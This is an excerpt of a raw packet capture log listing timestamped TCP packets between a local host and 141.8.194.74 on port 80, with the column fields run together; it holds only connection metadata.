                                                Apr 25, 2024 10:20:15.585892916 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.585911989 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.843754053 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.843800068 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.843842030 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.843880892 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.843890905 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.843919039 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.843928099 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.843959093 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.843995094 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844002008 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.844033003 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844069958 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844082117 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.844125032 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844163895 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844201088 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844202995 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.844238043 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844274998 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844286919 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.844317913 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:15.844353914 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:15.846633911 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.105532885 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105597973 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105642080 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105679035 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105696917 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.105719090 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105756044 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105772018 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.105794907 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105817080 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.105832100 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105869055 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105884075 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.105906963 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105943918 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.105953932 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106000900 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106040001 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106051922 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106077909 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106115103 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106153965 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106169939 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106190920 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106226921 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106232882 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106281042 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106317997 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106331110 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106354952 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106372118 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106394053 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106431961 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106450081 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106472015 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106508970 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106530905 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106549025 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106585979 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106602907 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106622934 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106659889 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106678963 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106698036 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106736898 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106748104 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106774092 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106811047 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106848001 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106884003 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106888056 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106925964 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106926918 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.106964111 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.106971025 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.107003927 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107117891 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107156038 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.107156038 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107192993 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107229948 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107251883 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.107265949 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107271910 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.107301950 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107338905 CEST8049746141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:16.107351065 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:16.109266996 CEST4974680192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.121246099 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.361629009 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.361876011 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.362122059 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.602190971 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.602665901 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.602761984 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.602832079 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.602914095 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.602941036 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.602958918 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.602998018 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.603003025 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.603035927 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.603055954 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.603072882 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.603132010 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.603162050 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.603199005 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.603254080 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844353914 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844405890 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844428062 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844460011 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844499111 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844537020 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844593048 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844630003 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844667912 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844705105 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844743013 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844779968 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844798088 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844798088 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844798088 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844798088 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844832897 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844870090 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844870090 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844908953 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844945908 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.844947100 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.844983101 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.845006943 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.845035076 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.845072031 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.845093966 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:46.845110893 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:46.845170021 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085263014 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085320950 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085346937 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085367918 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085403919 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085443974 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085457087 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085483074 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085520029 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085556984 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085594893 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085630894 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085635900 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085635900 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085649967 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085669041 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085705042 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085715055 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085741997 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085778952 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085794926 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085830927 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.087306976 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.328764915 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328809977 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328849077 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328886032 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328891039 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.328922033 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328959942 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328970909 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.328995943 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329010010 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329035044 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329071045 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329088926 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329108000 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329144955 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329164028 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329181910 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329217911 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329257011 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329258919 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329293966 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329310894 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329349041 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329386950 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329406023 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329425097 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329463959 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329483032 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329518080 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329554081 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329575062 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329590082 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329627991 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329653978 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329665899 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329704046 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329720974 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329741955 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329777002 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329798937 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329812050 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329849005 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329869032 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329886913 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329922915 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329942942 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329960108 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329998016 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330015898 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330035925 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330071926 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330105066 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330110073 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330147028 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330164909 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330183983 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330220938 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330240965 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330259085 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330293894 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330312014 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330331087 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330368042 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330387115 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330405951 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330465078 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.570564032 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.573030949 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:01.948868036 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.191613913 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.191829920 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.191961050 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.434397936 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434752941 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434835911 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434859991 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434899092 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434937000 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435004950 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435060978 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435105085 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435142040 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435146093 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.435146093 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.435178041 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.435184002 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435230017 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.677723885 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677792072 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677831888 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677865028 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.677871943 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677911043 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677947044 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.677953005 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677994013 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678020000 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678034067 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678072929 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678090096 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678109884 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678147078 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678172112 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678185940 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678251028 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678261042 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678289890 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678327084 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678344965 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678366899 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678405046 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678443909 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678459883 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678483963 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678524017 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678540945 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678572893 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.920994997 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921078920 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921128988 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921170950 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921210051 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921240091 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921247959 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921264887 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921288967 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921327114 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921340942 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921365976 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921403885 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921423912 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921447039 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921461105 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921488047 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921525955 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921561956 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921582937 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921675920 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921750069 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.922815084 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.166531086 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166594028 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166632891 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166690111 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.166691065 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166729927 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166754007 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.166771889 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166820049 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.167664051 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167706013 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167745113 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167778969 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.167783022 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167821884 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167845011 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.167896032 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167932987 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.167944908 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168004990 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168045044 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168060064 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168122053 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168160915 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168216944 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168240070 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168251038 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168256044 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168294907 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168332100 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168354034 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168389082 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168425083 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168447018 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168464899 CEST8049748141.8.194.74192.168.2.4
